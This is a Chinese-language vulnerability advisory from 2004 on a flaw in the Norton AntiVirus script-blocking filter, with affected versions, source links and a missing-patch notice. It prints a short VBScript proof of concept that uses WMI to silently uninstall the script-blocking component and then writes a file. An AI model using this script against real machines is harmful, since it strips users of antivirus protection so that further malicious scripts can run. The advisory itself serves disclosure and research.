Symantec Norton Antivirus脚本过滤器拒绝服务漏洞
发布日期:2004-07-16
更新日期:2004-07-26
受影响系统:Symantec Norton AntiVirus 2004
Symantec Norton AntiVirus 2003
Symantec Norton AntiVirus 2002
Symantec Norton AntiVirus 2001
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
描述:
BUGTRAQ ID:
10739
Symantec Norton AntiVirus是一款功能强大的反病毒程序。
Symantec Norton AntiVirus脚本过滤器存在拒绝服务问题,远程攻击者可以利用这个漏洞借此可绕过脚本检查。
攻击者可以构建恶意脚本,诱使使用Symantec Norton Antivirus软件的用户解析,可导致此解析器停止工作,而本身NORTON其他功能正常,因此攻击者可以再次使用其他恶意脚本,绕过防病毒系统。
<*来源:vozzie (
vozzie@gmail.com)
链接:
http://www.securityfocus.com/archive/82/369077/2004-07-13/2004-07-19/0
http://www.securityfocus.com/archive/82/369079/2004-07-13/2004-07-19/0
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
vozzie (
vozzie@gmail.com)提供了如下测试方法:
' get wmi
set wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
' enum soft
for each e in wmi.ExecQuery("Select * from Win32_Product")
on error resume next
' uninstall script blocker part of norton
if instr(e.name,"Script") and instr(e.name,"Block") then
e.UnInstall()
end if
next
' just do what you like
set fso = createobject("scripting.filesystemobject")
fso.createtextfile("c:\byenav.txt").write "=)"
建议:
厂商补丁:
Symantec
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.symantec.com/浏览次数:2954
严重程度:1(网友投票)
